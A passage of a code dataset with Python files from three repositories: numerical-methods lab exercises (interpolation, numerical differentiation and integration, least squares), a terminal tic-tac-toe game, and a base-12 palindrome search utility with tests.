IndexForEnd = IndexForStart + n \n\n return [self.table[0][IndexForStart:IndexForEnd], self.table[1][IndexForStart:IndexForEnd]]\n\n def printTable(self):\n print(self.table)\n\n def interpolate(self):\n self.table = self.CreateIterval(self.PolynomialDegree + 1, self.FindNum)\n #print(self.table)\n CreatedMatrix = self.ModifyTable(self.table, self.PolynomialDegree)\n #print(CreatedMatrix)\n tmp = 1\n res = 0\n for i in range(self.PolynomialDegree+1):\n res += tmp * CreatedMatrix[i+1][0]\n tmp *= (self.FindNum - CreatedMatrix[0][i])\n\n return res\n\ndef InputData(CheckException):\n try:\n PolynomialDegree = int(input(\"Введите степень полинома (целое, больше 0) > \"))\n #if PolynomialDegree <= 0:\n # print(\"Степень должна быть больше 0\")\n # CheckException = 0\n # return 0, 0, 0\n if PolynomialDegree > 11:\n print(\"Степень должна быть меньше либо равна кол-ву элементов таблицы\")\n CheckException = 0\n return 0, 0, 0\n except:\n print(\"Неправильный ввод степени полинома\\n\")\n CheckException = 0\n if CheckException:\n try:\n FindNum = float(input(\"Введите x (или y для обратной), относительно которого искать (вещественное) > \"))\n return PolynomialDegree, FindNum, CheckException\n except:\n print(\"Неправильный ввод x\\n\")\n CheckException = 0\n return 0, 0, 0\n\ndef InputDataForMethod(CheckException):\n try:\n a = float(input(\"Введите начало промежутка > \"))\n except:\n CheckException = 0\n print(\"Число должно быть целым!\")\n return 0, 0, 0\n if CheckException:\n try:\n b = float(input(\"Введите конец промежутка > \"))\n if b < a:\n CheckException = 0\n print(\"Число должно быть меньше начала промежутка!\")\n return 0, 0, 0\n elif b == a:\n CheckException = 0\n print(\"Число должно быть строго больше начала промежутка!\")\n return 0, 0, 0\n except:\n CheckException = 0\n print(\"Число должно быть целым!\")\n return 0, 0, 0\n return a, b, CheckException\n\ndef func(x):\n return x ** 3 + 1\n\nCheckException = 1\n\nPolynomialDegree, FindNum, CheckException = InputData(CheckException)\nif CheckException:\n ArrayForX = []\n StartX = -3\n for i in range(11):\n ArrayForX.append(StartX)\n StartX += 1\n ArrayForY = []\n for i in range(11):\n ArrayForY.append(func(ArrayForX[i]))\n for i in range (11):\n print(ArrayForX[i], ArrayForY[i])\n #ArrayForX = []\n #ArrayForY = []\n #ArrayForX = [1, 3, 4, 5]\n #ArrayForY = [2, -0.5, -10, 1]\n\n ObjectForResult = ConventionalInterpolation(PolynomialDegree, FindNum, ArrayForX, ArrayForY)\n Result = ObjectForResult.interpolate()\n print(\"\\nInterpolated: %.3f\" % Result)\n if CheckException:\n ObjectForResultReverse = ConventionalInterpolation(PolynomialDegree, 0, ArrayForY, ArrayForX)\n Result = ObjectForResultReverse.interpolate()\n print(\"Interpolated reverse: %.3f\" % Result)\n a, b, CheckException = InputDataForMethod(CheckException)\n if CheckException:\n ObjectForResultWithMethor = HalfDivisionMethod(a, b)\n Result = ObjectForResultWithMethor.MPD()\n print(\"Method: %.3f\" % Result)\n\n x = np.linspace(-1.0, 3.0, num=20)\n y = [func(i) for i in x]\n\n plt.title(\"Линейная зависимость y = x ** 3 + 1\") # заголовок\n plt.xlabel(\"x\")\n plt.ylabel(\"y\") \n plt.grid() \n plt.plot(x, y) \n plt.show()\n\n" }, { "alpha_fraction": 0.45167285203933716, "alphanum_fraction": 0.4843866229057312, "avg_line_length": 26.4489803314209, "blob_id": "35944f35c018c073415d0896ab7426d71edde072", "content_id": "13326e7eed174d36ecbb3d09463f2963d99f3d1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2690, "license_type": "no_license", "max_line_length": 195, "num_lines": 98, "path": "/SixthLab/6lab.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "def leftSide(y, h):\n res = []\n length = len(y)\n res.append('None')\n for i in range(1, length):\n res.append((y[i] - y[i - 1]) / h)\n return res\n\ndef rightSide(y, h):\n res = []\n length = len(y)\n for i in range(length - 1):\n res.append((y[i + 1] - y[i]) / h)\n res.append('None')\n return res\n\ndef centerSide(y, h):\n res = []\n length = len(y)\n step = 2 * h\n res.append('None')\n for i in range(1, length - 1, 1):\n res.append((y[i + 1] - y[i - 1]) / step)\n res.append('None')\n return res\n \ndef rungeLeft(y, h):\n res = []\n length = len(y)\n for i in range(2):\n res.append('None')\n for i in range(2, length):\n res.append(2 * ((y[i] - y[i - 1]) / h) - ((y[i] - y[i - 2]) / (2 * h)))\n return res\n\ndef rungeRight(y, h):\n res = []\n length = len(y)\n for i in range(length - 2):\n res.append(2 * ((y[i + 1] - y[i]) / h) - ((y[i + 2] - y[i]) / (2 * h)))\n for i in range(2):\n res.append('None')\n return res\n\ndef aligmentVariablesRight(x, y, h):\n res = []\n length = len(y)\n for i in range(0, length - 2):\n res.append((1 / y[i + 1] - 1 / y[i]) / (1 / x[i + 1] - 1 / x[i]) * y[i]**2 / x[i]**2)\n for i in range(2):\n res.append('None')\n return res\n\ndef aligmentVariablesLeft(x, y, h):\n res = []\n length = len(y)\n for i in range(2):\n res.append('None')\n for i in range(0, length - 2):\n res.append((1 / y[i] - 1 / y[i - 1]) / (1 / x[i] - 1 / x[i - 1]) * y[i]**2 / x[i]**2)\n return res\n\ndef secondDifference(x, y, h):\n res = []\n length = len(y)\n res.append('None')\n for i in range(1, length - 1):\n res.append((y[i - 1] - 2 * y[i] + y[i + 1]) / h ** 2)\n res.append('None')\n return res\n\ndef main():\n h = 1\n x = [i for i in range(1, 7, 1)]\n y = [0.571, 0.889, 1.091, 1.231, 1.333, 1.412]\n \n for line in [leftSide(y, h), rightSide(y, h), centerSide(y, h), rungeLeft(y ,h), rungeRight(y ,h), aligmentVariablesLeft(x, y, h), aligmentVariablesRight(x, y, h), secondDifference(x, y, h)]:\n for j in range(len(line)):\n element = line[j]\n if element != 'None':\n print('{:5.3}'.format(element), end=' ')\n continue\n print(element, end=' ')\n print()\n \n #print(leftSide(y, h))\n #print(rightSide(y, h))\n #print('*' * 20)\n #print(centerSide(y, h))\n #print('*' * 20)\n #print(rungeLeft(y ,h))\n #print(rungeRight(y, h))\n #print('*' * 20)\n #print(aligmentVariablesLeft(x, y, h))\n #print(aligmentVariablesRight(x, y, h))\n #print('*' * 20)\n #print(secondDifference(x, y, h))\nmain()\n" }, { "alpha_fraction": 0.5606177449226379, "alphanum_fraction": 0.5837838053703308, "avg_line_length": 29.11627960205078, "blob_id": "a4bb9c731d86527fbca93cf9a82088e8316bb445", "content_id": "ba58ce392d48e31fabc215112dd007ce8d0a64cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2658, "license_type": "no_license", "max_line_length": 91, "num_lines": 86, "path": "/SecondLab/SecondLab.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "import math\n\ndef ModifyTable(table, n):\n for i in range(n):\n tmp = []\n for j in range(n-i):\n tmp.append((table[i+1][j] - table[i+1][j+1]) / (table[0][j] - table[0][i+j+1]))\n table.append(tmp)\n return table\n\ndef CreateItervalForNeed(table, n, x):\n MaxLength = len((table))\n InderxNear = abs((table)[0] - x)\n for i in range(MaxLength):\n if abs((table)[i] - x) < InderxNear:\n InderxNear = abs((table)[i] - x)\n\n SpaceInFirstTable = math.ceil(n / 2) \n \n if (InderxNear + SpaceInFirstTable + 1 > MaxLength): \n IndexForEnd = MaxLength\n IndexForStart = MaxLength - n\n elif (InderxNear < SpaceInFirstTable):\n IndexForStart = 0\n IndexForEnd = n\n else:\n IndexForStart = InderxNear - SpaceInFirstTable + 1\n IndexForEnd = IndexForStart + n \n\n return table[IndexForStart:IndexForEnd]\n\ndef CreateIterval(table, n, x):\n MaxLength = len((table)[0])\n InderxNear = abs((table)[0][0] - x)\n for i in range(MaxLength):\n if abs((table)[0][i] - x) < InderxNear:\n InderxNear = abs((table)[0][i] - x)\n\n SpaceInFirstTable = math.ceil(n / 2) \n \n if (InderxNear + SpaceInFirstTable + 1 > MaxLength): \n IndexForEnd = MaxLength\n IndexForStart = MaxLength - n\n elif (InderxNear < SpaceInFirstTable):\n IndexForStart = 0\n IndexForEnd = n\n else:\n IndexForStart = InderxNear - SpaceInFirstTable + 1\n IndexForEnd = IndexForStart + n \n\n return [table[0][IndexForStart:IndexForEnd], table[1][IndexForStart:IndexForEnd]]\n\ndef interpolate(PolynomialDegree, FindNum, table):\n table = CreateIterval(table, PolynomialDegree + 1, FindNum)\n #print(table)\n CreatedMatrix = ModifyTable(table, PolynomialDegree)\n #print(CreatedMatrix)\n tmp = 1\n res = 0\n for i in range(PolynomialDegree+1):\n res += tmp * CreatedMatrix[i+1][0]\n tmp *= (FindNum - CreatedMatrix[0][i])\n\n return res\n\nif __name__ == \"__main__\":\n #try:\n x = float(input('Введите x >'))\n y = float(input('Введите y >'))\n nx = int(input('введите степень полинома по x >'))\n ny = int(input('введите степень полинома по y >'))\n #except:\n # print('Ошибка')\n ArrX = [0,1,2,3]\n ArrY = [0,1,2,3]\n MatrZnach = [\n [0,1,4,9], \n [1,2,5,10],\n [4,5,8,13],\n [9,10,13,18]]\n newZnach = []\n for i in range(len(ArrX)):\n newZnach.append(interpolate(ny, y, [ArrY, MatrZnach[i]]))\n print(newZnach)\n print(interpolate(nx, x, [ArrX, newZnach]))\n print(x ** 2 + y ** 2)\n" }, { "alpha_fraction": 0.5530243515968323, "alphanum_fraction": 0.5758051872253418, "avg_line_length": 25, "blob_id": "d318b54f651e4aadae27f143f00a4c8bb7999e81", "content_id": "90e7e69111dbdf631df0d003580f7b352a540a25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1314, "license_type": "no_license", "max_line_length": 94, "num_lines": 49, "path": "/FifthLab/5lab.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "from numpy.polynomial.legendre import leggauss\nfrom math import *\n\n\n\ndef replacement(x, y):\n return 2 * cos(x) / (1 - pow(sin(x), 2) * pow(cos(y), 2))\n\ndef function(parameter):\n return lambda x, y: (4 / pi) * (1 - exp(-parameter * replacement(x, y))) * cos(x) * sin(x)\n\ndef variableForConvertion(t):\n return (pi / 2) / 2 + (pi / 2) * t / 2\n\ndef gauss(func, nodes):\n args, coeffs = leggauss(nodes)\n res = 0\n for i in range(nodes):\n res += (pi / 2) / 2 * coeffs[i] * func(variableForConvertion(args[i]))\n return res\n\ndef simpson(func, nodes):\n h = (pi / 2) / (nodes - 1)\n x = 0\n res = 0\n for i in range((nodes - 1) // 2):\n res += func(x) + 4 * func(x + h) + func(x + 2 * h)\n x += 2 * h\n return res * (h / 3)\n\ndef convert(secondFunction, value):\n return lambda y: secondFunction(value, y)\n\ndef convertSimpson(func, M):\n return lambda x: simpson(convert(func, x), M)\n\ndef result(func, N, M, parameter):\n return gauss(convertSimpson(func, M), N)\n\ndef main():\n N = int(input(\"\\033[36m» Введите N: \"))\n M = int(input(\"» Введите M: \"))\n parameter = float(input(\"» Введите параметр: \"))\n\n print(\"Результат: \", round(result(function(parameter),N, M, parameter), 5))\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.539710283279419, "alphanum_fraction": 0.5604395866394043, "avg_line_length": 28.448530197143555, "blob_id": "f8d92f34f64e09f0b302007d9499994e3948bcb9", "content_id": "62d99301814614f6bea6f29ae659aeddc0626cbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4692, "license_type": "no_license", "max_line_length": 98, "num_lines": 136, "path": "/FourthLab/main.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "'''\nПринципиальным отличием задачи среднеквадратичного приближения от задачи интерполяции является то,\nчто число узлов превышает число параметров. В данном случае практически всегда не найдется такого\nвектора параметров, для которого значения аппроксимирующей функции совпадали бы со значениями\nаппроксимируемой функции во всех узлах.\nВ этом случае задача аппроксимации ставится как задача поиска такого вектора параметров\ncoefs = (c0, ..., cn)T, при котором значения аппроксимирующей функции как можно меньше отклонялись\nбы от значений аппроксимируемой функции F(x, coefs) в совокупности всех узлов.\n'''\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef f(points, coefs):\n res = [0.] * points\n for i in range(len(coefs)):\n res += coefs[i] * (points ** i)\n return res\n\n# Считать данные с файла\ndef read_file(filename):\n f = open(filename, \"r+\")\n x, y, weight = [], [], []\n for s in f:\n s = s.split(\" \")\n x.append(float(s[0]))\n y.append(float(s[1]))\n weight.append(float(s[2]))\n f.close()\n return x, y, weight\n\ndef print_table(x, y, weight):\n print(\"x y weight\")\n for i in range(len(x)):\n print(\"%.4f %.4f %.4f\" % (x[i], y[i], weight[i]))\n print()\n\ndef print_mtr(matrix):\n for i in matrix:\n print(i)\n\n# методом Гаусса\ndef solveSLAE(matrix):\n length = len(matrix)\n # приводим к треугольному виду\n for k in range(length):\n for i in range(k + 1, length):\n t = - (matrix[i][k] / matrix[k][k])\n for j in range(k, length + 1):\n matrix[i][j] += t * matrix[k][j]\n\n coefs = []\n for i in range(length):\n coefs.append(0) \n\n # Снизу вверх вычисляем каждый коэффициент\n # Получилась матрица вида:\n # a0 a1 a2 a3 a4 ...\n # Сама матрица:\n # x0 x1 x2 x3 ... y0 \n # 0 x1 x2 x3 ... y1 \n # 0 0 x2 x3 ... y2 \n # ...\n for i in range(length - 1, -1, -1):\n for j in range(length - 1, i, -1):\n matrix[i][length] -= coefs[j] * matrix[i][j]\n coefs[i] = matrix[i][length] / matrix[i][i]\n return coefs\n\ndef createMatr(x, y, weight, n, N):\n # Заполняем матрицу нулями\n matrix = []\n for i in range(n + 1):\n matrix.append([])\n for j in range(n + 2):\n matrix[i].append(0)\n\n # Составляем систему уравнение sum((x^k, x^m) * am) = (y, x^k)\n\n # Считаем (x^k, x^m) = sum(pi * xi^(k + m))\n for k in range(n + 1):\n for m in range(n + 1):\n curValue = 0\n for i in range(len(x)):\n curValue += pow(x[i], (k + m)) * weight[i]\n matrix[k][m] = curValue\n \n # Считаем (y, x^k) = sum(pi * yi * xi^k)\n for k in range(n + 1):\n curValue = 0\n for i in range(len(x)):\n curValue += y[i] * pow(x[i], k) * weight[i]\n matrix[k][n + 1] = curValue\n\n coefs = solveSLAE(matrix)\n \n return coefs\n\n'''\n#print(\"MATRIX\\n\")\n#print_mtr(matrix)\n\n#print(\"\\nCOEFFICIENTS\\n\\n\", coefs)\nprint(\"\\nAPPROXIMATION FUNCTION\\n\\nF = \", round(coefs[0], 2), sep=\"\", end=\"\")\nfor i in range(1, len(coefs)):\n print(\" + (\", round(coefs[i], 2), \") * x ** \", i, sep=\"\", end=\"\")\n''' \n\ndef make_plot(coefs, x, y, weight, dots):\n plt.figure(1)\n plt.plot(dots, f(dots, coefs))\n\n n = 1\n x2, y2, weight2 = read_file(\"dots2.txt\")\n N = len(x2)\n coefs2 = createMatr(x2, y2, weight2, n, N)\n dots2 = np.arange(x2[0] - 2, x2[len(x2) - 1] + 2, 0.01)\n plt.plot(dots2, f(dots2, coefs2), color=\"gray\")\n\n plt.ylabel(\"Y\")\n plt.xlabel(\"X\")\n for i in range(len(x)):\n plt.plot(x[i], y[i], 'ro', markersize=weight[i] + 2)\n plt.show()\n\ndef main():\n x, y, weight = read_file(\"dots.txt\")\n N = len(x) - 1 # количество узлов\n n = int(input(\"Enter the degree of the polynomial: \"))\n print(\"n = \", n, \" N = \", N)\n print_table(x, y, weight)\n coefs = createMatr(x, y, weight, n, N)\n dots = np.arange(x[0] - 2, x[len(x) - 1] + 2, 0.01)\n make_plot(coefs, x, y, weight, dots)\n\nmain()" } ]
6
utkarshrai/AskRai
https://github.com/utkarshrai/AskRai
d7e7d441c292cfe0e8d26d5bda0a4940610a91f0
0194c24c28153ad21cbcd76f5b82f03f409a80ec
d03b8f5a1085ec779a5fceeec4db6888aa83d908
refs/heads/master
2020-12-31T00:29:46.922898
2017-11-05T07:57:31
2017-11-05T07:57:31
85,419,215
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.478083074092865, "alphanum_fraction": 0.5099771022796631, "avg_line_length": 22.976470947265625, "blob_id": "4e5e8abcef747bc1426644dc1a509f6056bc1008", "content_id": "9d4c907127ffe9a8db32e954bd761c8fa0f2321b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6114, "license_type": "no_license", "max_line_length": 127, "num_lines": 255, "path": "/abc.py", "repo_name": "utkarshrai/AskRai", "src_encoding": "UTF-8", "text": "import sys\nimport random\n\n#Setting up Terminal Display, Seems clearer with underscores compared to dashes\ndef terminalDisplay():\n c=0\n for i in field[:2]:\n for j in i[:2]:\n print('', j, '|', end='')\n print('', field[c][2])\n c+=1\n print ('___|___|___')\n print ('', field[2][0], '|', field[2][1], '|', field[2][2])\n\n#Numbering from 1 to 9 on the grid\nfield = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n\n#Initial Interaction with the game\nplayer = input('Player Name : ')\nprint('Welcome to Utkarsh\\'s impossible Tic Tac Toe ', player)\nterminalDisplay()\nfirst = input('Do you want to move first: YES or NO? ')\n\n#Making lists of all posible moves and win possiblities \nmoveChoices = ['1', '2', '3', '4', '5', '6', '7', '8', '9']\nwinGame = [['1','2','3'], ['1','4','7'], ['1','5','9'], ['4','5','6'],['7','8','9'], ['2','5','8'],['3','6','9'],['3','5','7']]\n\nfirstAdvantage = ['5', '1', '3', '7', '9']\n\nsecondAdvantage = [['5', '1'], ['5', '3'], ['5', '7'],\n ['5', '9'], ['1', '3'], ['3', '9'],\n ['7', '9'], ['1', '7']]\n\nthirdAdvantage = [['1', '3', '5'], ['3', '5', '9'], ['7', '5', '9'],\n ['1', '5', '7'], ['1', '3', '9'], ['1', '3', '7'],\n ['7', '9', '3'], ['2', '4', '1'], ['2', '3', '6'],\n ['6', '9', '8'], ['4', '7', '8']]\n\n\n\nmoveCounter = 0\nmatchOver = False\nuserMoves = []\nmyMoves = []\nif (first == \"NO\"):\n print ('My turn: ')\n\n if (len(moveChoices) > 0):\n myMove = think()\n\n if (myMove in moveChoices):\n moveChoices.remove(myMove)\n else:\n print ('Ah! I wanted to win.')\n\n populate(myMove, 'o')\n\n terminalDisplay()\n\n moveCounter += 1\n'If player gets three in a row, player wins'\ndef checkWin(pos1, pos2, pos3, player):\n if ((pos1 is player) and (pos2 is player) and (pos3 is player)):\n playerWins = True\n draw = False\n else:\n playerWins = False\n return playerWins\n\n\n'Check all possible win scenarios for a player.'\ndef checkWinner(player):\n for i in range(3):\n win = checkWin(field[i][0], field[i][1], field[i][2], player)\n if win:\n if player is 'o':\n print('Victory for me! told you, impossible ! ')\n else:\n print ('You won?! You are amazing!')\n draw = False\n sys.exit(0)\n for i in range(3):\n win = checkWin(field[0][i], field[1][i], field[2][i], player)\n if win:\n if player is 'o':\n print('Victory for me! told you, impossible ! ')\n else:\n print ('You won?! You are amazing!')\n draw = False\n sys.exit(0)\n win = checkWin(field[0][0], field[1][1], field[2][2], player)\n if win:\n if player is 'o':\n print('Victory for me! told you, impossible ! ')\n else:\n print ('You won?! You are amazing!')\n draw = False\n sys.exit(0)\n\n win = checkWin(field[0][2], field[1][1], field[2][0], player)\n if win:\n if player is 'o':\n print('Victory for me! old you, impossible ! ')\n else:\n print ('You won?! You are amazing!')\n draw = False\n sys.exit(0)\ncounter = 0\n'Defines coordinates of each numbered position on board.'\ndef switch(x):\n return {\n '1': [0, 0],\n '2': [0, 1],\n '3': [0, 2],\n '4': [1, 0],\n '5': [1, 1],\n '6': [1, 2],\n '7': [2, 0],\n '8': [2, 1],\n '9': [2, 2]\n }[x]\n\n\n'Fills a position with players move.'\ndef populate(x, side):\n nums = switch(x)\n field[nums[0]][nums[1]] = side\n\n\n'Anticipate win or advantage for each player.'\ndef think():\n if moveCounter is 0:\n tInput = '5'\n elif moveCounter is 1:\n if userMoves[-1] is '5':\n tInput = '1'\n else:\n tInput = '5'\n else:\n tInput = anticipateWin()\n if tInput is '0':\n tInput = anticipateUserWin()\n if tInput is '0':\n tInput = anticipateAdvantage()\n if tInput is '0':\n tInput = anticipateUserAdvantage()\n if tInput is '0':\n tInput = random.choice(moves)\n myMoves.append(tInput)\n return tInput\n\n\ndef anticipate(posList, whoMoves):\n tInput = '0'\n for lis in posList:\n commonEl = set(whoMoves) & set(lis)\n if len(commonEl) > 1:\n for el in lis:\n if el not in commonEl:\n if el in moveChoices:\n tInput = el\n break\n break\n return tInput\n\n\ndef anticipateWin():\n tInput = anticipate(winGame, myMoves)\n return tInput\n\n\ndef anticipateUserWin():\n tInput = anticipate(winGame, userMoves)\n return tInput\n\n\ndef anticipateUserAdvantage():\n if len(userMoves) < 2:\n tInput = anticipate(secondAdvantage, userMoves)\n else:\n tInput = anticipate(thirdAdvantage, userMoves)\n return tInput\n\n\ndef anticipateAdvantage():\n tInput = '0'\n if len(myMoves) < 2:\n tInput = anticipate(secondAdvantage, myMoves)\n else:\n tInput = anticipate(thirdAdvantage, myMoves)\n return tInput\n\n\n\n\nif (first is 'NO'):\n print ('My turn: ')\n\n if (len(moveChoices) > 0):\n myMove = think()\n\n if (myMove in moveChoices):\n moveChoices.remove(myMove)\n else:\n print ('Ah! I wanted to win.')\n\n populate(myMove, 'o')\n\n terminalDisplay()\n\n moveCounter += 1\n\ndraw = True\n\nwhile (moveCounter < 9):\n\n move = input('Choose your move: ')\n\n userMoves.append(move)\n if (len(moveChoices) >= 0):\n moveChoices.remove(move)\n else:\n break\n\n populate(move, 'x')\n\n terminalDisplay()\n\n moveCounter += 1\n\n checkWinner('x')\n\n print ('My turn: ')\n\n if len(moveChoices) > 0:\n myMove = think()\n\n if (myMove in moveChoices):\n moveChoices.remove(myMove)\n else:\n print ('Ah! I wanted to win.')\n break\n\n populate(myMove, 'o')\n\n terminalDisplay()\n\n moveCounter += 1\n\n checkWinner('o')\n\nif draw:\n print ('Draw')\nelse:\n print('Something\\'s not right')\n" }, { "alpha_fraction": 0.8136646151542664, "alphanum_fraction": 0.8136646151542664, "avg_line_length": 79.5, "blob_id": "06ebeffc88de2736cd13fae6eae0a91367242e93", "content_id": "173a5aca59e701416f7acdfacf445f558e8dd583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 161, "license_type": "no_license", "max_line_length": 151, "num_lines": 2, "path": "/README.md", "repo_name": "utkarshrai/AskRai", "src_encoding": "UTF-8", "text": "# AskRai\nI'm trying to upload screenshots and some written instructions that shall prove useful to anyone who's beginning ML in Python on a Debian distribution.\n" } ]
2
meownoid/add-and-reverse
https://github.com/meownoid/add-and-reverse
01a4a5c96f6225627cb60ffdcde4a7dee12412ab
cdeb81c14aed07e0086ab56857a03150212e2f5a
42969c057fba7db4d7376c58f790711d2e898064
refs/heads/master
2022-12-02T12:08:13.276127
2022-11-21T21:20:12
2022-11-21T21:20:12
188,548,616
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5558829307556152, "alphanum_fraction": 0.5607935786247253, "avg_line_length": 23.242856979370117, "blob_id": "960ce08e51bee82ce6cbfa764324f0ae2b13f87d", "content_id": "00f4d143476850b9a4f4b06745dfb3445d199b0f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5091, "license_type": "permissive", "max_line_length": 88, "num_lines": 210, "path": "/main.py", "repo_name": "meownoid/add-and-reverse", "src_encoding": "UTF-8", "text": "import datetime\nimport sqlite3\nimport argparse\nimport time\nfrom collections import ChainMap\nfrom typing import Dict\nfrom multiprocessing import Pool\n\nfrom _fast import check_range\n\n\ndef prepare_db(conn: sqlite3.Connection) -> None:\n cur = conn.cursor()\n\n cur.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS results(\n date text,\n iterations integer UNIQUE NOT NULL,\n number integer\n )\n \"\"\"\n )\n\n cur.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS meta (\n date text,\n last_number integer\n )\n \"\"\"\n )\n\n conn.commit()\n\n\ndef load_results(conn: sqlite3.Connection) -> Dict[int, int]:\n cur = conn.cursor()\n\n return dict(cur.execute(\"SELECT iterations, number FROM results;\"))\n\n\ndef load_last_number(conn: sqlite3.Connection) -> int:\n cur = conn.cursor()\n\n result = cur.execute(\n \"SELECT max(last_number) AS last_number FROM meta;\"\n ).fetchone()[0]\n\n return 1 if result is None else result\n\n\ndef insert_result(conn: sqlite3.Connection, iterations: int, number: int) -> None:\n cur = conn.cursor()\n\n cur.execute(\n \"INSERT INTO results (date, iterations, number) VALUES (?, ?, ?)\",\n (datetime.datetime.now(), iterations, number),\n )\n\n\ndef insert_last_number(conn: sqlite3.Connection, last_number: int) -> None:\n cur = conn.cursor()\n\n cur.execute(\n \"INSERT INTO meta (date, last_number) VALUES (?, ?)\",\n (datetime.datetime.now(), last_number),\n )\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Utility for search of the most delayed palindromes\"\n )\n parser.add_argument(\n \"--database\",\n \"-d\",\n dest=\"database\",\n action=\"store\",\n default=\"db.sqlite\",\n help=\"path to the database file\",\n )\n parser.add_argument(\n \"--threads\",\n \"-t\",\n dest=\"threads\",\n type=int,\n action=\"store\",\n default=1,\n help=\"number of threads\",\n )\n parser.add_argument(\n \"--numbers\",\n \"-n\",\n dest=\"numbers\",\n type=int,\n action=\"store\",\n default=100000,\n help=\"number of numbers to check in one thread\",\n )\n parser.add_argument(\n \"--start\",\n \"-s\",\n dest=\"start\",\n type=int,\n action=\"store\",\n default=None,\n help=\"overrides starting number\",\n )\n parser.add_argument(\n \"--quiet\",\n \"-q\",\n dest=\"quiet\",\n action=\"store_const\",\n const=True,\n default=False,\n help=\"quiet mode\",\n )\n parser.add_argument(\n \"--results\",\n \"-r\",\n dest=\"results\",\n action=\"store_const\",\n const=True,\n default=False,\n help=\"show results and exit\",\n )\n parser.add_argument(\n \"--benchmark\",\n \"-b\",\n dest=\"benchmark\",\n action=\"store_const\",\n const=True,\n default=False,\n help=\"run benchmark while computing and display results\",\n )\n\n args = parser.parse_args()\n\n assert args.threads > 0\n assert args.numbers > 0\n assert args.start >= 0 if args.start is not None else True\n\n conn = sqlite3.connect(args.database)\n\n prepare_db(conn)\n\n old_results = load_results(conn)\n\n if args.results:\n for iterations, result in sorted(old_results.items()):\n print(f\"{iterations:8d} : {result:16d}\")\n\n return\n\n new_results = {}\n all_results = ChainMap(old_results, new_results)\n\n start = args.start if args.start is not None else load_last_number(conn)\n\n ranges = []\n end = start\n for _ in range(args.threads):\n ranges.append((end, end + args.numbers))\n end += args.numbers\n\n if not args.quiet:\n print(f\"Start: {start}\")\n print(f\"End: {end - 1}\")\n print(f\"Number of threads: {args.threads}\")\n\n with Pool(args.threads) as pool:\n start_time = time.time()\n for res in pool.starmap(check_range, ranges, chunksize=1):\n for key, value in res.items():\n if key not in all_results:\n new_results[key] = value\n continue\n\n if value < all_results[key]:\n new_results[key] = value\n elapsed_time = time.time() - start_time\n\n if args.benchmark:\n numbers_per_second = args.numbers / elapsed_time\n numbers_per_second_per_thread = numbers_per_second / args.threads\n print(\"Benchmark results:\")\n print(f\" Total time: {elapsed_time:.3f} seconds\")\n print(f\" Numbers per second: {int(numbers_per_second):d}\")\n print(\n f\" Numbers per second per thread: {int(numbers_per_second_per_thread):d}\"\n )\n\n for key, value in new_results.items():\n insert_result(conn, key, value)\n\n insert_last_number(conn, end)\n\n if not args.quiet:\n print(f\"Found new numbers: {len(new_results)}\")\n\n conn.commit()\n conn.close()\n\n if not args.quiet:\n print(\"Bye\")\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5437921285629272, "alphanum_fraction": 0.5803657174110413, "avg_line_length": 22.08888816833496, "blob_id": "ac380850a9cde4dbb67e7ed5b39a5e486cba3447", "content_id": "d5770c1e8ca6450c54f7f8f5913462dd4068b682", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2078, "license_type": "permissive", "max_line_length": 88, "num_lines": 90, "path": "/test.py", "repo_name": "meownoid/add-and-reverse", "src_encoding": "UTF-8", "text": "from _fast import (\n check,\n reverse_and_add_test,\n is_palindrome_test,\n MAX_ITERS_TEST,\n check_range,\n)\n\ndigits = \"0123456789AB\"\nreverse_digits = {d: i for i, d in enumerate(digits)}\n\n\ndef to_duodecimal(n: int) -> str:\n if n == 0:\n return \"0\"\n\n if n < 0:\n return f\"-{to_duodecimal(-n)}\"\n\n xs = []\n while n:\n xs.append(n % 12)\n n //= 12\n return \"\".join(map(lambda x: digits[x], reversed(xs)))\n\n\ndef from_duodecimal(n: str) -> int:\n if n[0] == \"-\":\n return -from_duodecimal(n[1:])\n\n return sum(map(lambda p: reverse_digits[p[1]] * 12 ** p[0], enumerate(reversed(n))))\n\n\ndef reverse_and_add_simple(n: int) -> int:\n return n + from_duodecimal(\"\".join(reversed(to_duodecimal(n))))\n\n\ndef is_palindrome_simple(n: int) -> bool:\n d = to_duodecimal(n)\n return d == \"\".join(reversed(d))\n\n\ndef check_simple(n: int) -> int:\n for i in range(MAX_ITERS_TEST):\n if is_palindrome_simple(n):\n return i\n n = reverse_and_add_simple(n)\n\n return -1\n\n\ndef test_to_duodecimal():\n assert to_duodecimal(0) == \"0\"\n assert to_duodecimal(1) == \"1\"\n assert to_duodecimal(9) == \"9\"\n assert to_duodecimal(10) == \"A\"\n assert to_duodecimal(11) == \"B\"\n assert to_duodecimal(12) == \"10\"\n assert to_duodecimal(13) == \"11\"\n assert to_duodecimal(23) == \"1B\"\n\n for i in range(1, 42):\n assert to_duodecimal(-i) == \"-\" + to_duodecimal(i)\n\n\ndef test_from_duodecimal():\n for i in range(-1000, 1000):\n assert i == from_duodecimal(to_duodecimal(i))\n\n\ndef test_reverse_and_add():\n for i in range(1, 1000):\n assert reverse_and_add_test(i) == reverse_and_add_simple(i)\n\n\ndef test_is_palindrome():\n for i in range(1, 100000):\n assert 